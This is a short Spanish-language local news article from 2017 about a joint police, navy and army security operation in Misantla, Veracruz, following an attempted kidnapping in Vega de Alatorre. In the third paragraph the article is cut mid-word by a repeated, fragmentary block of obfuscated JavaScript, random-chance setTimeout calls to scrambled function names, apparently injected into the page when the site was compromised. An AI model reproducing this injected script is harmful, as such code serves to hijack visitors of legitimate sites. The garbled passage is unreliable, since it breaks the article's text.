Afirma policía de Vega de Alatorre que habrá blindaje en Misantla

21 noviembre, 2017

Redacción. Misantla. Tras el operativo que se registrara en la ciudad de Vega de Alatorre, al ser detenidos y trasladados a esta ciudad tres personas presuntamente por actos indebidos, el delegado de la SSP con sede en la ciudad de Martínez indico que inicia el blindaje en Misantla.

Blindaje Misantla, inicia a partir de esta fecha, apunto quien dijo ser delegado de la SSP con sede en la ciudad de Martínez, al ser cuestionado sobre las acciones en conjunto con MARINA, SEDENA y Policías Municipales.

El mandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o regional apunto que esta mañana de martes se detectaron a tres personas que trataban de plagiar a una mujer en el municipio en mención, entre las 10 y 11 horas.

Dijo que en este operativo participaron dos vehículos de la MARINA, una de la Secretaria de Seguridad Publica y una unidad de la Policía Municipal de Vega de Alatorre, con un total de treinta elementos.

“Aquí se va a trabajar permanente con el ejército y MARINA; aquí en Misantla, hasta Chiconquiaco y Tenochtitlan, todo eso se va a recorrer durante la madrugada, tarde noche, depende como nos acomodemos”.

¿Esto se debió a la petición de las autoridades municipales?

“Así es,  es a petición”.

¿Estarán hasta Enero?

“Yo pienso que hasta enero o febrero, o no tenemos fechas hasta que se restablezca el orden”.

¿Para la denuncia ciudadana?

“Se va a poner unas mantas,  en las entradas y salidas, y con ustedes –prensa- que queremos que nos ayuden”.

Con esto la población misanteca, y la petición por parte de las autoridades municipales, hace que la confianza de los grupos policiacos y castrenses pueda tener la sociedad mas tranquilidad.